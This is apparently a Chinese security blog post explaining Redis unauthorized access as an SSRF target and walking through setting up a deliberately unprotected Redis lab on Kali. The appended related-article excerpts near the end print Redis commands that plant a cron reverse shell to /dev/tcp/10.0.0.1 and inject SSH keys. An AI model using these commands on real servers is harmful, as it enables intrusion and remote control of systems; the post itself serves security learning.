SSRF漏洞——redis

最新推荐文章于 2025-10-13 14:00:00 发布
原创 最新推荐文章于 2025-10-13 14:00:00 发布 · 486 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文介绍Redis作为缓存数据库的特性,探讨其未授权访问的安全风险,包括敏感信息泄露、数据清除及SSH公钥注入等。并演示如何在Kali环境下搭建Redis服务器,配置及启动过程。

Redis介绍

Redis是一个开源的使用ANSI C语言编写,支持网络,可基于内存亦和持久化的日志型,Key-Value数据库,并提供多种语言的API,通常被称为数据结构服务器。
通常点来说就是一个数据库,像这样的Redis经常用来去存放一些缓存,缓存文件之类的。

那么Redis通常会引发一些未授权的漏洞。
Redis因为配置不当可以未授权访问,攻击者不需要认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据。

攻击者可以通过eval执行LUA代码或者通过数据备份功能往磁盘写入后门文件。
如果Redis以root身份去运行,可以给root账号写入SSH公钥文件,直接通过SSH登录受害者服务器。

通常来说如果对方真的有Redis未授权我们就可以进一步去利用SSRF漏洞来去操作他内网的Redis,达到getshell的目的。

Redis环境搭建

这里我们搭建环境是直接在本机kali上去搭建。

首先我们需要去下载安装包。 wget http://download.redis.io/releases/redis-4.0.11.tar.gz

我们下载好这个安装包以后,我们需要上传到kali上面去的,然后我们就要去进一步的解压这个安装包。

在这里插入图片描述
解压安装包:tar-zxvf redis-4.0.11.tar.gz

解压以后我们在cd redis-4.0.11 # 这个目录里面去。
然后在make去执行 #编译
如果我们安装出现gcc错误,那么我们可以通过apt,在去安装gcc (apt-get install gcc),安装过后在去执行这个编译(make MALLOC=libc)就行了。

接下来我们去定位一下我们的这个Redis

在这里插入图片描述
启动我们的Redis,我们可以去到这个src目录下方去启动,/redis-server就可以启动了。

在这里插入图片描述
在这里我们还需要去做一下相关的修改配置,我们先vim redis的这个配置文件。
文件设置如下:

1、注释掉该ip地址,表示允许所有网络地址访问#bind 127.0.0.1
2、修改运行时不受保户 prorecred-mode no
3、修改为守护进程/后台程序(不需要进行这个操作,数据只会在后台运行时会保存,关闭将清空)daemonize yes
4、切换到src目录:cd src 启动客户端:./redis-cli 修改运行时不受保护,#config set protected-mode no 设置密码 #config set requirepass password

这个时候我们重新启动一下我们的客户端,然后我们就可以直接看到,ip地址和端口和上面的是一样的。

这个就是一个未授权访问,我们是没有输入账号和密码,就能够去访问到这个redis数据库

在这里插入图片描述

以上就是今天给大家讲解的srf漏洞中的redis,redis环境搭建和相关介绍。如果讲解不对的地方,多多担待。需要工具的也可以私聊我留言。

WEB漏洞——SSRF
qq_63594215的博客
04-11 1324
这次来介绍WEB漏洞的其中一种类型SSRF,文章将通过讲述其原理、如何挖掘以及怎么利用,包括如何防御和绕过,并且提供靶场来举例说明,详情请往下看。社交分享功能:获取超链接的标题等内容进行显示转码服务:通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览在线翻译:给网址翻译对应网页的内容图片加载/下载:例如富文本编辑器中的点击下载图片到本地;通过URL地址加载或下载图片云服务厂商:它会远程执行一些命令来判断网址是否存活等,所以如果可以捕获相应的信息,就可以进行ssrf测试。
【网络安全SSRF漏洞讲解
你在看屏幕的同时,屏幕也在注视着你
05-22 2946
SSRF漏洞讲解一、初识SSRF漏洞1.定义2.产生原理3.会导致的危害4.常见产生SSRF的地方5.常见缺失函数二、SSRF漏洞利用1.函数(1) file_get_contents(2)fsockopen()(3) curl_exec()2.协议(1)file协议(2)http协议(3)dict协议(4)gopher协议三、绕过1.绕过方式(1)检查IP是否为内网IP(2)Host获取与DNS绕过(3)通过各种协议(4)利用URL解析器滥用问题四、修复修复方案五、小结 一、初识SSRF漏洞 1.定义
ssrf漏洞攻击内网Redis复现
懂进攻知防守
07-21 1436
SSRF简介SSRF(Server-SideRequestForgery,服务端请求伪造),是攻击者让服务端发起构造的指定请求链接造成的漏洞。由于存在防火墙的防护,导致攻击者无法直接入侵内网;这时攻击者可以以服务器为跳板发起一些网络请求,从而攻击内网的应用及获取内网数据。大都是由于服务端提供了从其他服务器获取数据的功能,比如使用户从指定的URLweb应用获取图片、下载文件、读取文件内容等。.........
Redis漏洞利用,原来大佬都是这样操作的
qq_42982923的博客
05-26 2050
出自:Tide安全团队 1、前言 Redis相关的漏洞存在很长时间了,仍然存在可以利用的情景,本次整理复现下redis相关的漏洞利用,以便以后遇到能够快速建立利用思路。 2、redis介绍 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set()、zset(sorted set –有序)和...
RediShell”风暴:深度剖析Redis严重远程代码执行漏洞 CVE-2025-49844
专注于网络安全攻防技术与安全运营(SecOps)实践。
10-13 1742
摘要:2025年10月披露的Redis严重漏洞CVE-2025-49844(RediShell)引发全球关注。该漏洞潜伏13年,CVSS评分9.9-10.0,允许通过认证的攻击者利用Lua脚本引擎中的UAF漏洞实现远程代码执行。影响所有支持Lua的Redis版本,官方已发布8.2.2修复版本。临时缓解措施包括禁用Lua脚本、强制认证和网络隔离。建议用户立即升级或采取安全加固措施,防范这一高危漏洞带来的风险。
redis漏洞利用
yangzl123的博客
06-21 1186
redis未授权访问漏洞学习 1.       redis是什么 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。Redis的外围由一个键、值映射的字典构成。为高速低负载存储系统提供了一种解决方案。   2.       redis未授权访问 Redis 默认情况下,会绑定在 0.0.0.0:63
SSRF攻击Redis
cosmoslin的博客
10-27 1646
Redis简介 Redis是数据库的意思。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set –有序集合)和hash(哈希类型)。这些数据类型都支持p
SSRFRedis的利用
2301_80127209的博客
01-23 2270
SSRF(Server-Side Request Forgery,服务器请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统(因为请求是由服务端帮我们发起的,所以我们可以通过它来向其所在的内网机器发起请求)。Gopherus下载地址自己手动把攻击语句转换成Gopher协议的格式会很麻烦,这款工具里面内置了一些早就写好的利用语句,我们只需要学会如何使用它就可以很方便的写出一些我们需要的利用语句。
SSRF漏洞——pikachu
m0_65858385的博客
08-24 1534
综上,SSRF的危害极大,我们在进行代码审计的时候尤其需要注意是否存在file_get_contents()、fsockopen()、curl_exec()、fopen()、readfile()这些函数,这些函数是造成SSRF漏洞的成因之一。而我们预防SSRF漏洞可以从以下三点进行防御:1、限制请求的端口只能为Web端口,只允许访问HTTP和HTTPS的请求。2、限制不能访问内网的IP,以防止对内网进行攻击。3、屏蔽返回的详细信息。
ssrf漏洞之——漏洞复现
V_vevive的博客
08-25 970
6.发送三条redis命令,即可将弹shell的脚本写入/etc/crontab,之后将shell发送到指定的ip的一个端口,ip可自己更改,之后在192.168.16.131上使用nc监听4444端口,输入nc -lvvp 4444 开启监听。将url编码后的命令放到redis服务器的ip后(http://172.22.0.2:6379/命令),替换url发送,过一会nc处就会自动弹出一个控制172.22.0.2:6379的shell。将页面请求的url改为指定本地文件路径的url。
SSRF漏洞实现
Nirvana92的博客
08-24 915
但是测试他fastcgi的9000端口的时候检测不出来,但是通过看http的response返回值可以知道,就是9000端口,知道是fpm,因为fpm基本上90%都监听在9000端口上。那么接下来就传webshell就可以了,在172.21.0.2的物理路径下传webshell,那么他的物理路径是啥,说实话,不知道,只能猜或者测试。但是结果不尽人意,页面没有如何变化,或许shell.php根本没有写入,也许是我们猜错了或者没有权限(权限太低了),不管怎样,都是没有成功。
SSRFRedis
weixin_44843084的博客
06-06 973
SSRFRedis https://www.cnblogs.com/linuxsec/articles/11221756.html https://www.cnblogs.com/-chenxs/p/11749367.html 1.探测端口 http://xxx.xxx.xx.xx/xx/xx.php?url=http://目标:6379 如果探测到6379端口,那么可以利用http、gopher、dict这几个协议来打开放6379端口的redis服务, 原理是利用他们以目标机的身份执行对开启redis
SSRFredis
c582037的博客
01-09 317
ssrfredis
Redis漏洞利用的4种方法
qq_50854662的博客
05-13 4967
Redis简介 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更
Redis漏洞大全~讲解最全的漏洞利用方法
weixin_67832625的博客
08-11 3448
Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivota赞助。漏洞原理。
Redis未授权访问漏洞利用总结
热门推荐
Fly_鹏程万里
07-06 2万+
0x01 redis介绍Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。Redis因配置不当可以未授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flusha...
Redis漏洞及搭配ssrf利用的姿势
qq_71467825的博客
06-24 2815
这篇博客就总结到这里,下次把经典一点的SSRF题目都总结到一起再学习一波,冲冲冲!!!
利用SSRF攻击Redis
LUOBIKUN的博客
10-20 5736
SSRF漏洞+redis前置知识实验环境搭建SSRF攻击Redis通过redis写入ssh公钥,获取操作系统权限;直接向Web目录中写webshell;linux计划任务执行命令反弹shell。 前置知识 利用SSRF来攻击靶机的redis服务,需要涉及到的一些知识点: 1,Redis客户端和服务端通信过程,以及常用命令; 2,相关协议,例如dict://协议和gother协议的使用 dict://协议 词典网络协议,在RFC 2009中进行描述。它的目标是超越Webster protocol,并允许客户端
简述ssrf漏洞联动redis未授权访问漏洞以及redis 未授权获取shell的几种方式
最新发布
11-09
### SSRF 漏洞Redis 未授权访问漏洞的联动情况 SSRF(Server-Side Request Forgery,服务器端请求伪造)漏洞允许攻击者通过服务器向任意目标发起请求。而 Redis 未授权访问漏洞指的是 Redis 服务没有进行身份验证,攻击者可以直接访问并操作 Redis 数据库。 当一个存在 SSRF 漏洞的服务器可以访问 Redis 服务时,攻击者就可以利用 SSRF 漏洞让服务器向 Redis 服务发起恶意请求。例如,攻击者可以构造特殊的请求,通过 SSRF 漏洞使服务器向 Redis 服务发送命令,进而执行任意 Redis 命令,如写入数据、修改配置等,最终可能导致 Redis 服务器被控制,造成数据泄露、系统被入侵等严重后果。 ### Redis 未授权获取 shell 的几种方式 #### 利用 Redis 写文件功能 如果目标服务器的 Redis 服务以具有足够权限的用户运行,攻击者可以通过 Redis 的 `CONFIG SET` 命令修改 Redis 的配置,将持久化文件的路径和文件名设置为可执行文件的路径,再使用 `SET` 命令写入恶意代码,最后通过 `SAVE` 命令将数据持久化到文件中,当系统执行该文件时,攻击者就可以获得 shell。示例命令如下: ```plaintext # 设置 dir 为可执行文件目录 CONFIG SET dir /var/spool/cron/ # 设置 dbfilename 为定时任务文件 CONFIG SET dbfilename root # 写入反弹 shell 命令 SET x "\n* * * * * bash -i >& /dev/tcp/10.0.0.1/8888 0>&1\n" # 保存数据 SAVE ``` #### 利用 SSH 密钥写入 攻击者可以将自己的 SSH 公钥写入 Redis,然后将其保存到目标服务器的 `authorized_keys` 文件中,这样攻击者就可以通过 SSH 密钥登录到目标服务器,从而获得 shell。示例命令如下: ```plaintext # 设置 dir 为 SSH 目录 CONFIG SET dir /root/.ssh/ # 设置 dbfilename 为 authorized_keys CONFIG SET dbfilename authorized_keys # 写入 SSH 公钥 SET x "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC... your_public_key" # 保存数据 SAVE ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值